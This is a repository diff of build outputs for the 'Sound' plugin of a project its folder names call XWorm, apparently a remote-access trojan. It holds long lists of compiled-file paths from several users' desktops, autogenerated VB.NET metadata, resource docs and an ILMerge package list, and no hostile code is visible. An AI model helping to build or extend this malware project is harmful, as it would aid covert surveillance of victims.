C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.0 Update\XWorm V4.0 Update\XWorm V4.0\XWorm V4.0\XWorm V4.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\PC\Desktop\XWorm V4.1\XWorm V4.1\XWorm V4.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\Sound\Sound\obj\Debug\Sound.vbprojAssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Sound\Sound\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Sound\Sound\obj\Debug\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\Sound\Sound\obj\Debug\WSound.dll
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,26 @@
|
||||
<?xml version="1.0"?>
|
||||
<doc>
|
||||
<assembly>
|
||||
<name>
|
||||
Sound
|
||||
</name>
|
||||
</assembly>
|
||||
<members>
|
||||
<member name="T:Sound.My.Resources.Resources">
|
||||
<summary>
|
||||
A strongly-typed resource class, for looking up localized strings, etc.
|
||||
</summary>
|
||||
</member>
|
||||
<member name="P:Sound.My.Resources.Resources.ResourceManager">
|
||||
<summary>
|
||||
Returns the cached ResourceManager instance used by this class.
|
||||
</summary>
|
||||
</member>
|
||||
<member name="P:Sound.My.Resources.Resources.Culture">
|
||||
<summary>
|
||||
Overrides the current thread's CurrentUICulture property for all
|
||||
resource lookups using this strongly typed resource class.
|
||||
</summary>
|
||||
</member>
|
||||
</members>
|
||||
</doc>
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,2 @@
|
||||
WSound.dll
|
||||
NAudio.dll
|
||||
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
|
||||
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
|
||||
e31505f60aa9e6fb3de37a1a36b571397b359844459302b9fe8fa5261e55e6dc
|
||||
@@ -0,0 +1,6 @@
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Release\Sound.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Release\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Release\Sound.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Release\Sound.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Release\WSound.dll
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\Sound\Sound\obj\Release\WSound.pdb
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,2 @@
|
||||
WSound.dll
|
||||
NAudio.dll
|
||||
Binary file not shown.
@@ -0,0 +1,5 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<packages>
|
||||
<package id="ILMerge" version="3.0.41" targetFramework="net40" requireReinstallation="true" />
|
||||
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
|
||||
</packages>
|
||||
Reference in New Issue
Block a user